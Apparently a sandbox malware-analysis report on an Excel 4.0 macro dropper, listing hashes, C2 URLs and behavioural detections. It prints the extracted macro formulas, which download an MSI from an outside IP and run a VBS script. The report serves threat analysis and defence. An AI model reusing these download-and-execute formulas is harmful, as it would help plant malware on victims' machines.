General

  • Target

    05a3f7b2b4af6e5375780a9f77a84391

  • Size

    6KB

  • Sample

    231221-1n65aabdg8

  • MD5

    05a3f7b2b4af6e5375780a9f77a84391

  • SHA1

    1440fdff91fd25e0596260e8f616c433ab6ffaef

  • SHA256

    ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e

  • SHA512

    9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324

  • SSDEEP

    192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      05a3f7b2b4af6e5375780a9f77a84391

    • Size

      6KB

    • MD5

      05a3f7b2b4af6e5375780a9f77a84391

    • SHA1

      1440fdff91fd25e0596260e8f616c433ab6ffaef

    • SHA256

      ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e

    • SHA512

      9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324

    • SSDEEP

      192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks